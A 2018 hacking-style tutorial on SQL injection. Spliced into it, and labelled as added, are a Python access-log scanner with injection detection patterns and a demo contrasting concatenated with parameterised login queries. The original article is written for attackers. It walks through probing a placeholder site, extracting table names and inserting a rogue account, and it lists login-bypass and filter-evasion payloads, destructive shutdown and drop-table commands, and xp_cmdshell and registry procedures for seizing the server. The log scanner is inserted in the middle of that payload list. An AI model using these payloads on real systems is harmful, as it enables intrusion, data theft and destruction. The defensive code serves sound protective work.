SQL Injection

March 29, 2018 | Author: Technocrawl | Category: Sql, Crime Prevention, Information Science, Databases, Computer Security Exploits



SQL Injection – Full Disclosure

SQL injection is a technique that exploits a vulnerability in the database layer of a website just by executing SQL statements through the web browser. Take the simple example of signing up for a mail account for the first time. The input a user enters in a form field on the website is stored in a backend database. When the user next attempts to log in with a username and password, the application compares the input with the data stored in the database; if both match, it grants access to that user and lets them proceed with that login, otherwise it does not. So whatever a user types into an input box on a website is passed to the backend process. Attackers take advantage of this and type SQL queries into the input boxes, and if the site is vulnerable to SQL injection, it will be compromised.

Here is the detailed picture of how SQL injection works. SQL stands for Structured Query Language (also pronounced "Sequel") and is the common language that all databases use for manipulating the data stored in them. SQL queries are used to communicate with the database interactively for any kind of manipulation: creating a new table, modifying, updating, deleting, dropping and so on. A legitimate user enters valid credentials in the login form of a website, whereas an attacker tries to execute SQL queries in the input box instead of supplying credentials. The browser sends the request to the server, and the server executes the SQL query sent by the attacker. Nobody can easily break into a server that is vulnerable to SQL injection without first analysing the column names, table names and at least some of the values.

How to find out whether a site is vulnerable to SQL injection? "Blind injection" is the first step an attacker uses to check whether a site is vulnerable to SQL injection.
The attackers would try to inject some blind-injection inputs like the ones below:

'    (single quote)
"    (double quote)
'1   (single quote followed by 1)
'a   (single quote followed by a)
';   (single quote followed by a semicolon)

What the hell will this do? Well, it will fetch them a page with some error message generated by the database, and if it does, the site is vulnerable to SQL injection. The database generates an error because it does not know how to handle the query it was given, and the error shows clearly that either the database or the site itself is not configured properly. A single quote ' will often fetch you some errors.

I got an error, what next? Even a kid can generate an error like this! Let's get our hands wet here: now try to obtain the column names, table names and the number of columns and tables available, and that will do. An error produced by blind injection looks like this:

ADODB.Recordset error '800a0bb9'
Arguments are of the wrong type, are out of acceptable range, or are in conflict with one another.
/admin/CheckLogin.asp, line 68

There are even a few admins who leave the default settings unchanged; in such cases default credentials like sa and password may work, depending on the database.

How to obtain more details? Try trial and error here too, but keep it reasonable! Learn more about the errors generated by databases and inject a statement accordingly that would fetch you more fruitful information. Let me make one thing clear: SQL injection can be exploited in two ways, by injecting via the input boxes such as login and search fields found on the site, and by injecting in the URL. The database is bound to return an error if you input data of the wrong type. Suppose the target URL looks like this:

www.vulnsite.com\refer.asp?ID=3&action=view

Try some trial and error here, just by changing the URL parameters like below.
www.vulnsite.com\refer.asp?ID=0
www.vulnsite.com\refer.asp?ID=-1
www.vulnsite.com\refer.asp?ID=3&action=edit
www.vulnsite.com\refer.asp?ID=3&action=manage
www.vulnsite.com\refer.asp?ID=3&action=modify
and so on... (Note: this is just blind injection.)

www.vulnsite.com\refer.asp?ID=30 union select top 1 table_name from information_schema.tables--

The part www.vulnsite.com\refer.asp?ID=30 is the legitimate URL, and what follows it is malicious SQL injection code that will fetch you a table name from the victim's database. Suppose you got the table name and it is users:

www.vulnsite.com\refer.asp?ID=30 insert into users('id','username','password','info')values(100,'crawl','pass','')--

This creates a new user account in the database remotely; now you can log in with the newly created account and do whatever you wish. This is one of the ways, and there are several others.

There are even a few SQL built-in procedures that open the way wide for attackers to remotely shut down the SQL service or drop data, without any prior authentication:

'; shutdown --            Can be used to shut down the SQL service remotely.
'; drop table users --    Used to drop tables from the database remotely.

Here is a common one that really exploited most sites in the past:

1=1 --

When an attacker inputs this inside the input box, the statement 1=1 becomes true, since one always equals one (1 is equal to 1 is a globally true statement), and -- starts a comment in SQL, so whatever comes after -- is ignored. Just by injecting this an attacker can easily gain access to a vulnerable site and wreak havoc. What you have seen so far are the familiar ones, but there are still mushrooms of blind SQL injection strings around, and they are listed here:
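The trial-and-error probing described above leaves a trail in the web server's access log, which is where a defender first sees it. As an added example that is not part of the original article, the Python below scans constructed log lines (the request shapes mirror the URLs and statement fragments the article gives, URL-encoded as a browser sends them) for those fragments and reports clients that keep sending them. The sample log, the signature names and the function names are assumptions made for this demo.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (not taken from any real server). The
# first mirrors the legitimate URL from the article, the others mirror the
# injected parameters it lists, URL-encoded as a browser would send them.
SAMPLE_LOG = """\
203.0.113.5 - - [29/Mar/2018:10:00:01 +0000] "GET /refer.asp?ID=3&action=view HTTP/1.1" 200 512
203.0.113.5 - - [29/Mar/2018:10:00:07 +0000] "GET /refer.asp?ID=30%20union%20select%20top%201%20table_name%20from%20information_schema.tables-- HTTP/1.1" 500 88
203.0.113.5 - - [29/Mar/2018:10:00:12 +0000] "GET /refer.asp?ID=3%27 HTTP/1.1" 500 88
198.51.100.7 - - [29/Mar/2018:10:01:00 +0000] "GET /search.asp?q=%27%20or%201%3D1-- HTTP/1.1" 200 2048
198.51.100.7 - - [29/Mar/2018:10:01:30 +0000] "GET /login.asp?user=%27%3B%20exec%20master..xp_cmdshell%20%27dir%27-- HTTP/1.1" 200 300
192.0.2.9 - - [29/Mar/2018:10:02:00 +0000] "GET /refer.asp?ID=30 HTTP/1.1" 200 512
"""

# Common-log request line: client, timestamp, method, path, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3}) \d+'
)

# Signatures drawn from the statement fragments the article shows. They run
# on the URL-decoded query string; word boundaries keep ordinary words inside
# a search term from matching on their own.
SIGNATURES = [
    ("union-select",       re.compile(r"\bunion\b.*\bselect\b", re.I)),
    ("schema-enumeration", re.compile(r"\binformation_schema\b", re.I)),
    ("tautology",          re.compile(r"\bor\b\s*\(?\s*['\"]?\w+['\"]?\s*=\s*['\"]?\w+", re.I)),
    ("stacked-statement",  re.compile(r";\s*(shutdown|drop|insert|exec)\b", re.I)),
    ("extended-procedure", re.compile(r"\b(xp_|sp_)\w+", re.I)),
    ("comment-terminator", re.compile(r"(--|/\*)\s*$")),
]


def decode_query(path):
    """Return the URL-decoded query string of a request path ('' if none),
    so %27 and %20 are inspected as the quote and space the database sees."""
    _, _, query = path.partition("?")
    return unquote_plus(query)


def classify(query):
    """Names of every signature the decoded query trips. An odd number of
    single quotes is flagged separately: that is the lone ' probe the article
    describes, which no keyword signature would catch."""
    hits = [name for name, pattern in SIGNATURES if pattern.search(query)]
    if query.count("'") % 2 == 1:
        hits.append("unbalanced-quote")
    return hits


def scan_log(text):
    """One finding per flagged request: (client ip, decoded query,
    signature names, HTTP status). A 500 next to a flagged query is the
    error page the article says gives a vulnerable site away."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        query = decode_query(m.group("path"))
        hits = classify(query)
        if hits:
            findings.append((m.group("ip"), query, hits, int(m.group("status"))))
    return findings


def probing_clients(findings, min_requests=2):
    """Clients with at least min_requests flagged requests, sorted. The
    trial-and-error pattern shows up as a run of flagged requests from one
    address rather than as a single odd URL."""
    counts = {}
    for ip, _query, _hits, _status in findings:
        counts[ip] = counts.get(ip, 0) + 1
    return sorted(ip for ip, n in counts.items() if n >= min_requests)


if __name__ == "__main__":
    results = scan_log(SAMPLE_LOG)
    for ip, query, hits, status in results:
        print(f"{ip} {status} {hits} {query!r}")
    print("probing clients:", probing_clients(results))
```

Decoding before matching matters: the raw request line carries %27 and %20, so a rule written against the literal quote or the word union would miss every encoded request. The unbalanced-quote check is deliberately kept apart from the keyword signatures, since the single quote probe carries no keyword at all and is the earliest signal in the sequence the article describes.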
admin' --
admin' #
admin'/*
1=1--
' or 1=1--
' or 1=1#
' or 1=1/*
') or '1'='1--
1' OR '1'='1
') or ('1'='1--
' UNION SELECT 1, 'anotheruser', 'doesnt matter', 1--
SELECT * FROM members WHERE username = 'admin'--' AND password = 'password'
if ((select user) = 'sa' OR (select user) = 'dbo') select 1 else select 1/0
SELECT login + '-' + password FROM members
SELECT login || '-' || password FROM members
SELECT CONCAT(login, password) FROM members
SELECT CONCAT(CHAR(75),CHAR(76),CHAR(77))
SELECT CHAR(75)+CHAR(76)+CHAR(77)
SELECT header, txt FROM news UNION ALL SELECT name, pass FROM members
' UNION SELECT 1, 'anotheruser', 'doesnt matter', 1--
DR/**/OP/*bypass blacklisting*/sampletable
SELECT/*avoid-spaces*/password/**/FROM/**/Members
SELECT /*!32302 1/0, */ 1 FROM tablename
SELECT * FROM products WHERE id = 10; DROP members--

What else can an attacker do with this? If the site administrator is not aware of the built-in procedures that come with SQL Server, and if they are not restricted, then the attacker can easily root the box. An attacker can remotely launch a command shell, execute commands and even shut down the whole server, resulting in a denial-of-service (DoS) attack. They can also access the registry, create a new administrator account remotely, turn the machine into a bot, and so on. Here are a few:

sp_password -> Changes the password for a specific login name. e.g. EXEC sp_password 'oldpass', 'newpass', 'username'
sp_tables -> Shows all the tables in the current database. e.g. EXEC sp_tables
xp_cmdshell -> Runs an arbitrary command on the machine with administrator privileges. e.g. exec master..xp_cmdshell 'dir' (displays the directory listing of the current working directory), exec master..xp_cmdshell 'net1 user'
master..xp_msver
xp_regwrite -> Writes a registry key.
xp_regread -> Reads a registry value.
xp_regdeletekey -> Deletes a registry key.
xp_regdeletevalue -> Deletes a registry value.
xp_regaddmultistring, xp_regenumkeys, xp_regenumvalues, xp_regremovemultistring -> Further registry procedures.
xp_terminate_process -> Terminates a process, given its PID.
xp_availablemedia -> Reveals the available drives on the box.
xp_dirtree -> Allows a directory tree to be obtained.
xp_enumdsn -> Enumerates ODBC data sources on the server.
xp_loginconfig -> Reveals information about the security mode of the server.
xp_makecab -> Allows a user to create a compressed archive of files on the server.
xp_ntsec_enumdomains -> Enumerates the domains that the server can access.

There are a few SQL injection vulnerability assessment tools available on the internet free of cost, with which you can assess whether your resource is vulnerable to SQL injection or not:

SQLBF -> MS SQL Server password auditor
SQL Dict -> MS SQL based dictionary cracker
SQL Smack -> Used to execute remote commands
SQL Poke -> SQL port scanner; connects as SA and executes commands

- Cybercrawler
www.technocrawler.co.cc
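Every trick in the article comes back to one root cause: form input pasted into the SQL text. As an added example that is not code from the original article, here is the login check the article describes, written twice in Python against a constructed in-memory SQLite table: once concatenating the input into the statement, and once passing it as a bound parameter. The function names (make_db, vulnerable_login, safe_login) and the sample users are assumptions made for the demo.

```python
import sqlite3

# Constructed sample backend: an in-memory SQLite table standing in for the
# site's users table described in the article. Plaintext passwords appear only
# to mirror that scenario, not as a recommended design.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, "
                 "username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users (id, username, password) VALUES (?, ?, ?)",
                     [(1, "admin", "s3cret"), (2, "alice", "wonderland")])
    conn.commit()
    return conn


def vulnerable_login(conn, username, password):
    """The pattern the article describes: the form input is pasted straight
    into the SQL text, so quotes and comment markers become part of the query.
    Returns the matched username, None when nothing matches, or "db-error"
    when the database rejects the malformed statement (the error page the
    article says gives a vulnerable site away)."""
    query = ("SELECT username FROM users WHERE username = '" + username
             + "' AND password = '" + password + "'")
    try:
        row = conn.execute(query).fetchone()
    except sqlite3.OperationalError:
        return "db-error"
    return row[0] if row else None


def safe_login(conn, username, password):
    """Parameterised form: the driver passes the input as data, never as SQL,
    so a quote or a -- in the input is compared literally and cannot change
    the statement. A plain failure comes back instead of a database error."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    for user, pw in [("admin", "s3cret"), ("'", "x"),
                     ("' or 1=1 --", "x"), ("admin' --", "")]:
        print(repr(user), "-> concatenated:", vulnerable_login(db, user, pw),
              "| parameterised:", safe_login(db, user, pw))
```

Running it shows the three outcomes the article walks through in order: the lone quote turns into a database error from the concatenated version, the 1=1 input logs in as the first row of the table, and admin' -- logs in as admin without a password, while the parameterised version returns a plain failure for all three. Parameterisation is the fix; generic error pages and a database account that cannot reach the xp_ and sp_ procedures listed above limit what a remaining flaw can be used for.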